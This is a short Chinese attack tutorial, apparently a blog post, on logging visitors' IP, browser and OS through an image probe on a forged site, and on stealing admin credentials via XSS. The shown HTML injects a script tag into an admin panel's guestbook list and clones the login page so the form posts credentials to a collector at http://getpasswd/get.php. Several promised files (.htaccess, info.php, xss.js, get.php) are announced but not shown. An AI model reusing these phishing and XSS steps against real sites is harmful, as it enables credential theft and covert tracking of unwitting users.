1、利用图片探针获取访问者IP地址、浏览器等信息
.htaccess文件内容如下:
info.php实现起来比较简单,就是通过http请求头来获取当前IP地址、UA等信息并记录到日志文件当中。
一切准备就绪,访问搭建好的伪造网站,等待受害者访问即可获取访问者的IP地址、UA、操作系统、浏览器等信息
2、利用XSS获取登录用户名密码
代码文件如下:
代码量很小,我在这里直接贴出来
//admin_login.html 本来的管理员登录页面
<html> <body> <head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>管理员登录</title></head> <form method="post" action="http://xxx/x.xx"> 用户名:<br> <input type="text"> <br> 密码:<br> <input type="text"> <br><br> <input type="submit" value="登录"> </form> </body> </html>//admin_index.html 原本的管理后台页面
<html> <body> <head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>管理员后台</title></head> <h1>这里是管理员后台,你已成功登录</h1> <button type="button">一键日卫星</button> <hr><b>最新留言</b> <ul> <li>Zoro好帅</li> <li>楼上说得对</li> <script src= "xss.js"></script> </ul> </body> </html>//fish.html 我们仿的登录页面,也就是钓鱼页
<body> <head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>管理员登录</title></head> <form method="post" action="http://getpasswd/get.php">//这里发送给接收程序 用户名:<br> <input type="text"> <br> 密码:<br> <input type="text"> <br><br> <input type="submit" value="Submit"> </form> </body> </html>//get.php 数据接收文件